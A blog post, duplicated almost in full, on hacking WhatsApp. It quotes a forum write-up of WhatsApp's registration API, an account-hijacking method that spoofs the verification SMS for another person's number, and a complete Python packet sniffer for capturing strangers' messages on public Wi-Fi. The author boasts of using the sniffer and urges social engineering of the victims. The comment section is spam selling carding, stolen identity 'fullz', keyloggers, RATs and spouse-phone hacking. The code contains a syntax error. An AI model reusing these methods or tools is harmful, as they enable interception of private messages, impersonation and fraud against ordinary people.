Whatsapp Hack
I have heard that whatsapp is not encrypted ( its an app like viber) and
that when you sign up for a number hte code is generated within your
phone sent to whatssapp servers and then sent to you. because it is not
encrpted you can intercept it from your phone I have been trying to
figure it out for days saw many links, does anyone have any advice ?
here are two posts I found on the internet that might help. They used to
have this thing where all you had to do was put your phone in airplane
mode and the activation code would be in your outbox not sent, but that
wont work anymore.
A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.
I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)
I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:
The first thing is the login-Name and the password needed to login:
Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:
international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net
For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.
The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.
I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)
The second thing I searched for is the registration process.
With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly
The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)
0) All these API-Request are done with an User-Agent like:
Code:
WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00
The Code generating this is: http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.
1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)
The API-call looks like this:
Code:
https://r.whatsapp.n...0000&method=sms
The Arguments are as following:
cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)
The metod is maybe the most interesting thing.
There are 3 methods: self, sms and voice
When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>
The Answer after calling the API is an xml saying:
Code:
<code><response status="sucess-sent" result="30"></code>
What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^
Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:
Code:
WhatsApp code abc
abc is the necessary Code
2) With the given code you can then register your Whatsapp-Account
API-Call:
Code:
https://r.whatsapp.n...d=asdf&code=abc
cc/in = the same as in code.php
udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code
The XML response looks like:
Code:
<register> <response status="ok" login="4917612345" result="new" /> </register>
The login-value is your login-Name for the connection and built like explained.
I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^
3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.
API-call:
Code:
https://r.whatsapp.n...12345&udid=asdf
Parameters are the same like above.
Resonse when account with this number and pw exists:
Code:
<exist><response status="ok" result="4917612345" /></exist>
The result again gives the login-name for this account.
I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)
The last thing I searced for before studing for my exams was the server connection.
It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.
I think there are some small differences between the default XAMPP and the way WhatsApp does it.
But nevertheless the URL I found to where it tries to connect is:
Code:
socket://bin-short.whatsapp.net:5222
When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.
When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.
The Login-Process in the WhatsApp-Code looks like:
Code:
out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();
Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:
Code:
send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();
-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.
Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.
Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU
Thats all I did up to now (or more exactly before my exams).
I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all
If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view
PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now
I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )
and then I found this :
How to hack WhatsApp Messenger on Nokia, iPhone & Android
shareshareshareshare
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.
Hack 1
Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code
You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.
I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)
I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:
The first thing is the login-Name and the password needed to login:
Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:
international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net
For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.
The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.
I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)
The second thing I searched for is the registration process.
With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly
The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)
0) All these API-Request are done with an User-Agent like:
Code:
WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00
The Code generating this is: http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.
1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)
The API-call looks like this:
Code:
https://r.whatsapp.n...0000&method=sms
The Arguments are as following:
cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)
The metod is maybe the most interesting thing.
There are 3 methods: self, sms and voice
When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>
The Answer after calling the API is an xml saying:
Code:
<code><response status="sucess-sent" result="30"></code>
What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^
Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:
Code:
WhatsApp code abc
abc is the necessary Code
2) With the given code you can then register your Whatsapp-Account
API-Call:
Code:
https://r.whatsapp.n...d=asdf&code=abc
cc/in = the same as in code.php
udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code
The XML response looks like:
Code:
<register> <response status="ok" login="4917612345" result="new" /> </register>
The login-value is your login-Name for the connection and built like explained.
I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^
3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.
API-call:
Code:
https://r.whatsapp.n...12345&udid=asdf
Parameters are the same like above.
Resonse when account with this number and pw exists:
Code:
<exist><response status="ok" result="4917612345" /></exist>
The result again gives the login-name for this account.
I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)
The last thing I searced for before studing for my exams was the server connection.
It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.
I think there are some small differences between the default XAMPP and the way WhatsApp does it.
But nevertheless the URL I found to where it tries to connect is:
Code:
socket://bin-short.whatsapp.net:5222
When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.
When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.
The Login-Process in the WhatsApp-Code looks like:
Code:
out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();
Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:
Code:
send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();
-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.
Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.
Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU
Thats all I did up to now (or more exactly before my exams).
I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all
If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view
PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now
I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )
and then I found this :
How to hack WhatsApp Messenger on Nokia, iPhone & Android
shareshareshareshare
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.
Hack 1
Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code
You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
Author: Anonymous
Related Posts:
Subscribe to:
Post Comments (Atom)
Check out this website:
ReplyDeletehttp://www.whatsapphack.com/
Hello all
Deleteam looking few years that some guys comes into the market
they called themselves hacker, carder or spammer they rip the
peoples with different ways and it’s a badly impact to real hacker
now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
Anyone want to make deal with me any type am available but first
I‘ll show the proof that am real then make a deal like
Available Services
..Wire Bank Transfer all over the world
..Western Union Transfer all over the world
..Credit Cards (USA, UK, AUS, CAN, NZ)
..School Grade upgrade / remove Records
..Spamming Tool
..keyloggers / rats
..Social Media recovery
.. Teaching Hacking / spamming / carding (1/2 hours course)
discount for re-seller
Contact: 24/7
fixitrogers@gmail.com
LEGIT FULLZ & TOOLS STORE
DeleteHello to All !
We are offering all types of tools & Fullz on discounted price.
If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
Feel Free to contact
***CONTACT 24/7***
**Telegram > @leadsupplier
**ICQ > 752822040
**Skype > Peeterhacks
**Wicker me > peeterhacks
"SSN LEADS/FULLZ AVAILABLE"
"TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
CARDING, CASHOUT, CLONING, SCRIPTING ETC"
**************************************
"Fresh Spammed SSN Fullz info included"
>>SSN FULLZ with complete info
>>CC With CVV Fullz USA
>>FULLZ FOR SBA, PUA & TAX RETURN FILLING
>>USA I.D Photos Front & Back
>>High Credit Score fullz (700+ Scores)
>>DL number, Employee Details, Bank Details Included
>>Complete Premium Info with Relative Info
***************************************
COMPLETE GUIDE FOR TUTORIALS & TOOLS
"SPAMMING" "HACKING" "CARDING" "CASH OUT"
"KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
"FRAUD BIBLE"
"TOOLS & TUTORIALS LIST"
=>Ethical Hacking Ebooks, Tools & Tutorials
=>Bitcoin Hacking
=>Kali Linux
=>Fraud Bible
=>RAT
=>Keylogger & Keystroke Logger
=>Whatsapp Hacking & Hacked Version of Whatsapp
=>Facebook & Google Hacking
=>Bitcoin Flasher
=>SQL Injector
=>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
=>Bitcoin Cracker
=>SMTP Linux Root
=>Shell Scripting
=>DUMPS with pins track 1 and 2 with & without pin
=>SMTP's, Safe Socks, Rdp's brute
=>PHP mailer
=>SMS Sender & Email Blaster
=>Cpanel
=>Server I.P's & Proxies
=>Viruses & VPN's
=>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)
*Serious buyers will always welcome
*Price will be reduce in bulk order
*Discount offers will gives to serious buyers
*Hope we do a great business together
===>Contact 24/7<===
==>Telegram > @leadsupplier
==>ICQ > 752822040
==>Skype > Peeterhacks
==>Wicker me > peeterhacks
If anyone Wants to Hack Whats app at Cheap Price.
ReplyDeleteI am giving that Service ...If anyone Intereseted...
You can be My members:
Contact me : shubhmsam2129@gmail.com
or addme Skype : shubham211995
There are so many Satisfied members though.
Download Whatsapp Spy Hacks free working here:
ReplyDeletehttp://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
http://smashinghacks.net/download/whatsapp-hack
0535779936
ReplyDeleteReply
ReplyDeleteHow it works? Which is the way to run above code?
ReplyDeleteGo To These Links:
ReplyDeleteWhatsApp Hack
Go To These Links:
WhatsApp Hack
Go To These Links:
WhatsApp Hack
Go To These Links:
WhatsApp Hack
Go To These Links:
WhatsApp Hack
Thanks for Sharing a Very Interesting Article. This Is Very Useful Information for Online Blog Review Readers. Keep It Up Such a Nice Posting Like This. Recently I Am Looking for WiFihacker After Spending Time on This Topic Finally I Found the Legit hacking wifi methods.
ReplyDeleteI were looking for cheats on how to get free gift codes in legit way and accidentally found a tool which generate unlimited eBay card codes.
ReplyDeleteI hard to believe that many incredible bloggers are talking about you, but actually they did. Congrats for your big successful in blogging community, and hope to contribute my testimonial over here if you love. I am sharing some important topic now you can get easily coupon codes visit my site.click here
ReplyDelete
ReplyDeleteI got access to my husband’s mobile phone through the help of Mr James (Worldcyberhackers) on Gmail or WhatsApp:+12678773020 . He helped me in Hacking my husband’s iPhone and I got all his text messages. I’m so sad he is cheating on me. I’m sending all evidence to my lawyer. Thank you Mr James.
Bonjour les gars, contactez deadlyhacker01@gmail.com ou WhatsApp: +1 3478577580 si vous avez besoin d'embaucher un vrai pirate pour surveiller le téléphone portable de votre conjoint.
ReplyDeleteWebsite: www.neonhacker.com
ReplyDeleteEmail: hacker@neonhacker.com
PHONE NO(whatsapp): +1805-399-2804
We are a group of hackers called Neon hackers and we offer hacking services for everyone. Some of our services are:
- Bitcoin and other crypto retrieval **
- Cell phone hacking
- messages hack
- Get any password from any Email Address.
- Get any password from any Facebook, Twitter or Instagram account.
- Cell phone hacking (whatsapp, viber, line, wechat, etc)
- Credit score upgrade
- Change or upgrade of grade
- Loan and work programs
- Clearing criminal records
- Websites hacking, pentesting.
- IP addresses and people tracking.
- Hacking courses and classes.
Our services are the best on the market and 100% secure and discreet guaranteed.
© NEONHACKER
Website: www.neonhacker.com
Email: hacker@neonhacker.com
PHONE NO(whatsapp): +1805-399-2804
We are a group of hackers called Neon hackers and we offer hacking services for everyone. Some of our services are:
